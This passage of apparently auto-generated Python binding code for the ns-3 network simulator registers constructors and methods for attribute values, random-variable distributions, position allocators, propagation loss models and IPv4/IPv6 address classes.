'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## attribute.h (module 'core'): std::string ns3::EmptyAttributeChecker::GetUnderlyingTypeInformation() const [member function] cls.add_method('GetUnderlyingTypeInformation', 'std::string', [], is_const=True, is_virtual=True) ## attribute.h (module 'core'): std::string ns3::EmptyAttributeChecker::GetValueTypeName() const [member function] cls.add_method('GetValueTypeName', 'std::string', [], is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::EmptyAttributeChecker::HasUnderlyingTypeInformation() const [member function] cls.add_method('HasUnderlyingTypeInformation', 'bool', [], is_const=True, is_virtual=True) return def register_Ns3EmptyAttributeValue_methods(root_module, cls): ## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')]) ## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, visibility='private', is_virtual=True) ## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], visibility='private', is_virtual=True) ## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, visibility='private', is_virtual=True) return def register_Ns3ErlangRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ErlangRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::ErlangRandomVariable::ErlangRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetK() const [member function] cls.add_method('GetK', 'uint32_t', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetLambda() const [member function] cls.add_method('GetLambda', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetValue(uint32_t k, double lambda) [member function] cls.add_method('GetValue', 'double', [param('uint32_t', 'k'), param('double', 'lambda')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetInteger(uint32_t k, uint32_t lambda) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'k'), param('uint32_t', 'lambda')]) ## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3ExponentialRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ExponentialRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::ExponentialRandomVariable::ExponentialRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetMean() const [member function] cls.add_method('GetMean', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetBound() const [member function] cls.add_method('GetBound', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetValue(double mean, double bound) [member function] cls.add_method('GetValue', 'double', [param('double', 'mean'), param('double', 'bound')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ExponentialRandomVariable::GetInteger(uint32_t mean, uint32_t bound) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mean'), param('uint32_t', 'bound')]) ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::ExponentialRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3FixedRoomPositionAllocator_methods(root_module, cls): ## building-position-allocator.h (module 'buildings'): ns3::FixedRoomPositionAllocator::FixedRoomPositionAllocator(ns3::FixedRoomPositionAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::FixedRoomPositionAllocator const &', 'arg0')]) ## building-position-allocator.h (module 'buildings'): ns3::FixedRoomPositionAllocator::FixedRoomPositionAllocator(uint32_t x, uint32_t y, uint32_t z, ns3::Ptr<ns3::Building> b) [constructor] cls.add_constructor([param('uint32_t', 'x'), param('uint32_t', 'y'), param('uint32_t', 'z'), param('ns3::Ptr< ns3::Building >', 'b')]) ## building-position-allocator.h (module 'buildings'): int64_t ns3::FixedRoomPositionAllocator::AssignStreams(int64_t arg0) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'arg0')], is_virtual=True) ## building-position-allocator.h (module 'buildings'): ns3::Vector ns3::FixedRoomPositionAllocator::GetNext() const [member function] cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True) ## building-position-allocator.h (module 'buildings'): static ns3::TypeId ns3::FixedRoomPositionAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) return def register_Ns3FixedRssLossModel_methods(root_module, cls): ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::FixedRssLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## propagation-loss-model.h (module 'propagation'): ns3::FixedRssLossModel::FixedRssLossModel() [constructor] cls.add_constructor([]) ## propagation-loss-model.h (module 'propagation'): void ns3::FixedRssLossModel::SetRss(double rss) [member function] cls.add_method('SetRss', 'void', [param('double', 'rss')]) ## propagation-loss-model.h (module 'propagation'): double ns3::FixedRssLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True) ## propagation-loss-model.h (module 'propagation'): int64_t ns3::FixedRssLossModel::DoAssignStreams(int64_t stream) [member function] cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True) return def register_Ns3FriisPropagationLossModel_methods(root_module, cls): ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::FriisPropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## propagation-loss-model.h (module 'propagation'): ns3::FriisPropagationLossModel::FriisPropagationLossModel() [constructor] cls.add_constructor([]) ## propagation-loss-model.h (module 'propagation'): void ns3::FriisPropagationLossModel::SetFrequency(double frequency) [member function] cls.add_method('SetFrequency', 'void', [param('double', 'frequency')]) ## propagation-loss-model.h (module 'propagation'): void ns3::FriisPropagationLossModel::SetSystemLoss(double systemLoss) [member function] cls.add_method('SetSystemLoss', 'void', [param('double', 'systemLoss')]) ## propagation-loss-model.h (module 'propagation'): void ns3::FriisPropagationLossModel::SetMinLoss(double minLoss) [member function] cls.add_method('SetMinLoss', 'void', [param('double', 'minLoss')]) ## propagation-loss-model.h (module 'propagation'): double ns3::FriisPropagationLossModel::GetMinLoss() const [member function] cls.add_method('GetMinLoss', 'double', [], is_const=True) ## propagation-loss-model.h (module 'propagation'): double ns3::FriisPropagationLossModel::GetFrequency() const [member function] cls.add_method('GetFrequency', 'double', [], is_const=True) ## propagation-loss-model.h (module 'propagation'): double ns3::FriisPropagationLossModel::GetSystemLoss() const [member function] cls.add_method('GetSystemLoss', 'double', [], is_const=True) ## propagation-loss-model.h (module 'propagation'): double ns3::FriisPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True) ## propagation-loss-model.h (module 'propagation'): int64_t ns3::FriisPropagationLossModel::DoAssignStreams(int64_t stream) [member function] cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True) return def register_Ns3GammaRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::GammaRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::GammaRandomVariable::GammaRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetAlpha() const [member function] cls.add_method('GetAlpha', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetBeta() const [member function] cls.add_method('GetBeta', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetValue(double alpha, double beta) [member function] cls.add_method('GetValue', 'double', [param('double', 'alpha'), param('double', 'beta')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::GammaRandomVariable::GetInteger(uint32_t alpha, uint32_t beta) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'alpha'), param('uint32_t', 'beta')]) ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::GammaRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3GridBuildingAllocator_methods(root_module, cls): ## building-allocator.h (module 'buildings'): ns3::GridBuildingAllocator::GridBuildingAllocator(ns3::GridBuildingAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::GridBuildingAllocator const &', 'arg0')]) ## building-allocator.h (module 'buildings'): ns3::GridBuildingAllocator::GridBuildingAllocator() [constructor] cls.add_constructor([]) ## building-allocator.h (module 'buildings'): ns3::BuildingContainer ns3::GridBuildingAllocator::Create(uint32_t n) const [member function] cls.add_method('Create', 'ns3::BuildingContainer', [param('uint32_t', 'n')], is_const=True) ## building-allocator.h (module 'buildings'): static ns3::TypeId ns3::GridBuildingAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## building-allocator.h (module 'buildings'): void ns3::GridBuildingAllocator::SetBuildingAttribute(std::string n, ns3::AttributeValue const & v) [member function] cls.add_method('SetBuildingAttribute', 'void', [param('std::string', 'n'), param('ns3::AttributeValue const &', 'v')]) return def register_Ns3GridPositionAllocator_methods(root_module, cls): ## position-allocator.h (module 'mobility'): ns3::GridPositionAllocator::GridPositionAllocator(ns3::GridPositionAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::GridPositionAllocator const &', 'arg0')]) ## position-allocator.h (module 'mobility'): ns3::GridPositionAllocator::GridPositionAllocator() [constructor] cls.add_constructor([]) ## position-allocator.h (module 'mobility'): int64_t ns3::GridPositionAllocator::AssignStreams(int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')], is_virtual=True) ## position-allocator.h (module 'mobility'): double ns3::GridPositionAllocator::GetDeltaX() const [member function] cls.add_method('GetDeltaX', 'double', [], is_const=True) ## position-allocator.h (module 'mobility'): double ns3::GridPositionAllocator::GetDeltaY() const [member function] cls.add_method('GetDeltaY', 'double', [], is_const=True) ## position-allocator.h (module 'mobility'): ns3::GridPositionAllocator::LayoutType ns3::GridPositionAllocator::GetLayoutType() const [member function] cls.add_method('GetLayoutType', 'ns3::GridPositionAllocator::LayoutType', [], is_const=True) ## position-allocator.h (module 'mobility'): double ns3::GridPositionAllocator::GetMinX() const [member function] cls.add_method('GetMinX', 'double', [], is_const=True) ## position-allocator.h (module 'mobility'): double ns3::GridPositionAllocator::GetMinY() const [member function] cls.add_method('GetMinY', 'double', [], is_const=True) ## position-allocator.h (module 'mobility'): uint32_t ns3::GridPositionAllocator::GetN() const [member function] cls.add_method('GetN', 'uint32_t', [], is_const=True) ## position-allocator.h (module 'mobility'): ns3::Vector ns3::GridPositionAllocator::GetNext() const [member function] cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True) ## position-allocator.h (module 'mobility'): static ns3::TypeId ns3::GridPositionAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## position-allocator.h (module 'mobility'): void ns3::GridPositionAllocator::SetDeltaX(double deltaX) [member function] cls.add_method('SetDeltaX', 'void', [param('double', 'deltaX')]) ## position-allocator.h (module 'mobility'): void ns3::GridPositionAllocator::SetDeltaY(double deltaY) [member function] cls.add_method('SetDeltaY', 'void', [param('double', 'deltaY')]) ## position-allocator.h (module 'mobility'): void ns3::GridPositionAllocator::SetLayoutType(ns3::GridPositionAllocator::LayoutType layoutType) [member function] cls.add_method('SetLayoutType', 'void', [param('ns3::GridPositionAllocator::LayoutType', 'layoutType')]) ## position-allocator.h (module 'mobility'): void ns3::GridPositionAllocator::SetMinX(double xMin) [member function] cls.add_method('SetMinX', 'void', [param('double', 'xMin')]) ## position-allocator.h (module 'mobility'): void ns3::GridPositionAllocator::SetMinY(double yMin) [member function] cls.add_method('SetMinY', 'void', [param('double', 'yMin')]) ## position-allocator.h (module 'mobility'): void ns3::GridPositionAllocator::SetN(uint32_t n) [member function] cls.add_method('SetN', 'void', [param('uint32_t', 'n')]) return def register_Ns3HybridBuildingsPropagationLossModel_methods(root_module, cls): ## hybrid-buildings-propagation-loss-model.h (module 'buildings'): static ns3::TypeId ns3::HybridBuildingsPropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## hybrid-buildings-propagation-loss-model.h (module 'buildings'): ns3::HybridBuildingsPropagationLossModel::HybridBuildingsPropagationLossModel() [constructor] cls.add_constructor([]) ## hybrid-buildings-propagation-loss-model.h (module 'buildings'): void ns3::HybridBuildingsPropagationLossModel::SetEnvironment(ns3::EnvironmentType env) [member function] cls.add_method('SetEnvironment', 'void', [param('ns3::EnvironmentType', 'env')]) ## hybrid-buildings-propagation-loss-model.h (module 'buildings'): void ns3::HybridBuildingsPropagationLossModel::SetCitySize(ns3::CitySize size) [member function] cls.add_method('SetCitySize', 'void', [param('ns3::CitySize', 'size')]) ## hybrid-buildings-propagation-loss-model.h (module 'buildings'): void ns3::HybridBuildingsPropagationLossModel::SetFrequency(double freq) [member function] cls.add_method('SetFrequency', 'void', [param('double', 'freq')]) ## hybrid-buildings-propagation-loss-model.h (module 'buildings'): void ns3::HybridBuildingsPropagationLossModel::SetRooftopHeight(double rooftopHeight) [member function] cls.add_method('SetRooftopHeight', 'void', [param('double', 'rooftopHeight')]) ## hybrid-buildings-propagation-loss-model.h (module 'buildings'): double ns3::HybridBuildingsPropagationLossModel::GetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('GetLoss', 'double', [param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, is_virtual=True) return def register_Ns3Ipv4AddressChecker_methods(root_module, cls): ## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker(ns3::Ipv4AddressChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4AddressChecker const &', 'arg0')]) return def register_Ns3Ipv4AddressValue_methods(root_module, cls): ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4AddressValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4AddressValue const &', 'arg0')]) ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4Address const & value) [constructor] cls.add_constructor([param('ns3::Ipv4Address const &', 'value')]) ## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4AddressValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4AddressValue::Get() const [member function] cls.add_method('Get', 'ns3::Ipv4Address', [], is_const=True) ## ipv4-address.h (module 'network'): std::string ns3::Ipv4AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4AddressValue::Set(ns3::Ipv4Address const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Ipv4Address const &', 'value')]) return def register_Ns3Ipv4MaskChecker_methods(root_module, cls): ## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker(ns3::Ipv4MaskChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4MaskChecker const &', 'arg0')]) return def register_Ns3Ipv4MaskValue_methods(root_module, cls): ## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4MaskValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4MaskValue const &', 'arg0')]) ## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4Mask const & value) [constructor] cls.add_constructor([param('ns3::Ipv4Mask const &', 'value')]) ## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4MaskValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4MaskValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## ipv4-address.h (module 'network'): ns3::Ipv4Mask ns3::Ipv4MaskValue::Get() const [member function] cls.add_method('Get', 'ns3::Ipv4Mask', [], is_const=True) ## ipv4-address.h (module 'network'): std::string ns3::Ipv4MaskValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4MaskValue::Set(ns3::Ipv4Mask const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Ipv4Mask const &', 'value')]) return def register_Ns3Ipv6AddressChecker_methods(root_module, cls): ## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker() [constructor] cls.add_constructor([]) ## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker(ns3::Ipv6AddressChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv6AddressChecker const &', 'arg0')]) return def register_Ns3Ipv6AddressValue_methods(root_module, cls): ## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue() [constructor] cls.add_constructor([]) ## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6AddressValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv6AddressValue const &', 'arg0')]) ## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6Address const & value) [constructor] cls.add_constructor([param('ns3::Ipv6Address const &', 'value')]) ## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6AddressValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6AddressValue::Get() const [member function] cls.add_method('Get', 'ns3::Ipv6Address', [], is_const=True) ## ipv6-address.h (module 'network'): std::string ns3::Ipv6AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6AddressValue::Set(ns3::Ipv6Address const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Ipv6Address const &', 'value')]) return def register_Ns3Ipv6PrefixChecker_methods(root_module, cls): ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker() [constructor] cls.add_constructor([]) ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker(ns3::Ipv6PrefixChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv6PrefixChecker const &', 'arg0')]) return def register_Ns3Ipv6PrefixValue_methods(root_module, cls): ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue() [constructor] cls.add_constructor([]) ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6PrefixValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv6PrefixValue const &', 'arg0')]) ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6Prefix const & value) [constructor] cls.add_constructor([param('ns3::Ipv6Prefix const &', 'value')]) ## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6PrefixValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6PrefixValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix ns3::Ipv6PrefixValue::Get() const [member function] cls.add_method('Get', 'ns3::Ipv6Prefix', [], is_const=True) ## ipv6-address.h (module 'network'): std::string ns3::Ipv6PrefixValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6PrefixValue::Set(ns3::Ipv6Prefix const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Ipv6Prefix const &', 'value')]) return def register_Ns3ItuR1238PropagationLossModel_methods(root_module, cls): ## itu-r-1238-propagation-loss-model.h (module 'buildings'): ns3::ItuR1238PropagationLossModel::ItuR1238PropagationLossModel() [constructor] cls.add_constructor([]) ## itu-r-1238-propagation-loss-model.h (module 'buildings'): static ns3::TypeId ns3::ItuR1238PropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## itu-r-1238-propagation-loss-model.h (module 'buildings'): double ns3::ItuR1238PropagationLossModel::GetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('GetLoss', 'double', [param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True) ## itu-r-1238-propagation-loss-model.h (module 'buildings'): double ns3::ItuR1238PropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True) ## itu-r-1238-propagation-loss-model.h (module 'buildings'): int64_t ns3::ItuR1238PropagationLossModel::DoAssignStreams(int64_t stream) [member function] cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True) return def register_Ns3ListPositionAllocator_methods(root_module, cls): ## position-allocator.h (module 'mobility'): ns3::ListPositionAllocator::ListPositionAllocator(ns3::ListPositionAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::ListPositionAllocator const &', 'arg0')]) ## position-allocator.h (module 'mobility'): ns3::ListPositionAllocator::ListPositionAllocator() [constructor] cls.add_constructor([]) ## position-allocator.h (module 'mobility'): void ns3::ListPositionAllocator::Add(ns3::Vector v) [member function] cls.add_method('Add', 'void', [param('ns3::Vector', 'v')]) ## position-allocator.h (module 'mobility'): int64_t ns3::ListPositionAllocator::AssignStreams(int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')], is_virtual=True) ## position-allocator.h (module 'mobility'): ns3::Vector ns3::ListPositionAllocator::GetNext() const [member function] cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True) ## position-allocator.h (module 'mobility'): static ns3::TypeId ns3::ListPositionAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) return def register_Ns3LogDistancePropagationLossModel_methods(root_module, cls): ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::LogDistancePropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## propagation-loss-model.h (module 'propagation'): ns3::LogDistancePropagationLossModel::LogDistancePropagationLossModel() [constructor] cls.add_constructor([]) ## propagation-loss-model.h (module 'propagation'): void ns3::LogDistancePropagationLossModel::SetPathLossExponent(double n) [member function] cls.add_method('SetPathLossExponent', 'void', [param('double', 'n')]) ## propagation-loss-model.h (module 'propagation'): double ns3::LogDistancePropagationLossModel::GetPathLossExponent() const [member function] cls.add_method('GetPathLossExponent', 'double', [], is_const=True) ## propagation-loss-model.h (module 'propagation'): void ns3::LogDistancePropagationLossModel::SetReference(double referenceDistance, double referenceLoss) [member function] cls.add_method('SetReference', 'void', [param('double', 'referenceDistance'), param('double', 'referenceLoss')]) ## propagation-loss-model.h (module 'propagation'): double ns3::LogDistancePropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True) ## propagation-loss-model.h (module 'propagation'): int64_t ns3::LogDistancePropagationLossModel::DoAssignStreams(int64_t stream) [member function] cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True) return def register_Ns3LogNormalRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::LogNormalRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::LogNormalRandomVariable::LogNormalRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetMu() const [member function] cls.add_method('GetMu', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetSigma() const [member function] cls.add_method('GetSigma', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetValue(double mu, double sigma) [member function] cls.add_method('GetValue', 'double', [param('double', 'mu'), param('double', 'sigma')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::LogNormalRandomVariable::GetInteger(uint32_t mu, uint32_t sigma) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mu'), param('uint32_t', 'sigma')]) ## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::LogNormalRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', 